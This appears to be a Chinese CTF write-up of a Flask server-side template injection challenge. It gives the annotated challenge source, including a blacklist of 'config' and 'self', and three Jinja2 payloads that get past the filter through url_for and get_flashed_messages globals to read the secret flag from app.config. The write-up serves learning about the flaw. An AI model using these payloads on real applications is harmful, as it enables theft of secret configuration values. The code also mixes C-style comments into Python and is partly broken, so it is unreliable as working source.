Flask模板注入

访问地址拿到源码整理得

import flask
import os

app = flask.Flask(__name__) 
/*创建了flask包下的Flask类的对象，name是一个适用于多数情况的快捷方式。有了这个参数，Flask才知道在哪里可以找到模板和静态文件*/

app.config['FLAG'] = os.environ.pop('FLAG')
//这句话的意思就是说flag在app的config变量里


@app.route('/')

/* @app.route(url) 是Flask框架中的一个装饰器，他的作用是在程序运行时，装饰一个视图函数，用给定的url规则和选项注册他*/

def index():
    return open(__file__).read() //相当于返回源码，也就是我们看到源码的页面


@app.route('/shrine/<path:shrine>')
//这个是带参数的写法
def shrine(shrine): // 这里shrine的值就是上面的 <path:shrine>

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '') // 先将 ) 替换为 空，再将 ( 替换为 空
        blacklist = ['config', 'self']
        return ''.join(['{
   {% set {}=None%}}'.format(c) for c in blacklist]) + s 
//匹配黑名单,将匹配到的config和self换成空字符

    return flask.render_template_string(safe_jinja(shrine)) 
// 这句话就是调用了过滤函数对用户输入的网址进行过滤


if __name__ == '__main__':
    app.run(debug=True) //如果这个python是主程序，则启动app

1.什么是 @app.route()

Flask入门[email protected]()使用_Philo`的博客-CSDN博客[email protected](/)斜杠代表什么意思

2.关于os.environ.pop()

(1条消息) OS.ENVIRON()详解_junweifan的博客-CSDN博客_os.environ[]

os.environ 是 python获取系统信息的一个方法

3.python中 join的方法

Python join()方法 | 菜鸟教程 (runoob.com)

题解：从整理好的代码中，我们得出 flag在config变量中，但config,self,(), 都被过滤了.

假设没有过滤，可以尝试直接访问 config变量或者 { {self.dict}}来获取变量

如果有过滤，就需要尝试通过全局变量实现沙盒逃逸

{
   {url_for.__globals__['current_app'].config.FLAG}}
{
   {get_flashed_messages.__globals__['current_app'].config.FLAG}}
{
   {request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}

CTF|有关SSTI的一切小秘密【Flask SSTI+姿势集+Tplmap大杀器】 - 知乎 (zhihu.com)